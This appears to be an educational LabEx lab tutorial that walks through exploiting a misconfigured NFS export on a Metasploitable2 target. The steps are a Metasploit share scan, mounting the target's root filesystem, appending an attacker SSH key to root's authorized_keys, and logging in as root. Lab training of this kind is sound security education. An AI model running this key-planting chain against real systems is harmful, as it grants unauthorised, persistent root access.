LabEx
Log In Join For Free

Exploiting NFS Misconfiguration

Beginner

Introduction

Network File System (NFS) is a distributed file system protocol that allows users to access remote files as if they were local. However, improper configuration of NFS can lead to severe security vulnerabilities, allowing attackers to gain unauthorized access to the system. In this lab, you will learn how to exploit NFS misconfiguration to gain root access to a target machine.

The goal of this lab is to understand the risks associated with NFS misconfiguration and learn how to perform a successful NFS-based attack. By the end of the lab, you will have gained hands-on experience in identifying NFS shares, mounting them locally, and leveraging the misconfiguration to obtain root privileges on the target system.

Scan for NFS Shares

In this step, you will use the Metasploit Framework to scan the target machine for NFS shares.

Now you will start the attack machine (Kali Linux container) and the target machine (Metasploitable2 virtual machine) for the experiment.

  1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2
  1. Test the connectivity to the target machine by pinging it:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

  1. Launch the Kali Linux container and enter the bash environment by running:
docker run -ti --network host --privileged b5b709a49cd5 bash

There is an extra --privileged parameter, which is used so that the root inside the container has real root privileges, otherwise the root inside the container is just a normal user with external privileges. Starting a container with the --privileged parameter will allow you to see many of the devices on the host and perform a mount, and will even allow you to start docker containers within docker containers.

  1. Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

  1. Now, launch the Metasploit console:
cd ~
msfconsole
  1. In the Metasploit console, use the auxiliary/scanner/nfs/nfsmount module to scan for NFS shares:
use auxiliary/scanner/nfs/nfsmount
set rhosts 192.168.122.102
set threads 5
show options
exploit

This module will scan the target system and display any exported NFS shares.

Press Ctrl+D to quit the Metasploit console then start the inspection

Mount the NFS Share

In this step, you will mount the NFS root share on the Kali container.

First, install the nfs-common package:

cd /
apt-get install -y nfs-common

Mount the NFS root share:

mount -t nfs -o nolock 192.168.122.102:/ /mnt

This command will mount the target system's root directory (/) to the /mnt directory on the Kali container.

Verify that the NFS share is mounted correctly by listing the contents of the /mnt directory:

ls /mnt

You should see the contents of the target system's root directory.

Create SSH Key Pair

In this step, you will create an SSH key pair to enable passwordless SSH access to the target system.

Generate an SSH key pair:

ssh-keygen -t rsa -b 4096 -f /root/.ssh/id_rsa

This command will create two files: /root/.ssh/id_rsa (private key) and /root/.ssh/id_rsa.pub (public key).

Enable Passwordless SSH Access

In this step, you will add the public key to the target system's authorized keys file, enabling passwordless SSH access.

Copy the public key to the target system's authorized keys file:

cat /root/.ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys

This command will append the contents of your public key file to the /root/.ssh/authorized_keys file on the target system.

Gain Root Access

In this step, you will use the passwordless SSH access to log in as the root user on the target system.

Connect to the target system using SSH:

ssh -o HostKeyAlgorithms=ssh-rsa,ssh-dss root@192.168.122.102

You should now have a root shell on the target system without being prompted for a password.

Summary

In this lab, you learned how to exploit NFS misconfiguration to gain unauthorized root access to a target system. You started by scanning for NFS shares using the Metasploit Framework, then mounted the NFS root share on your local machine. Next, you created an SSH key pair and added the public key to the target system's authorized keys file, enabling passwordless SSH access. Finally, you used the passwordless SSH access to log in as the root user on the target system.

This lab demonstrated the importance of properly configuring NFS shares and the potential risks associated with misconfiguration. By understanding these vulnerabilities, you can better secure your systems and protect against potential attacks.

Other Tutorials you may like

We use cookies for a number of reasons, such as keeping the website reliable and secure, to improve your experience on our website and to see how you interact with it. By accepting, you agree to our use of such cookies. Privacy Policy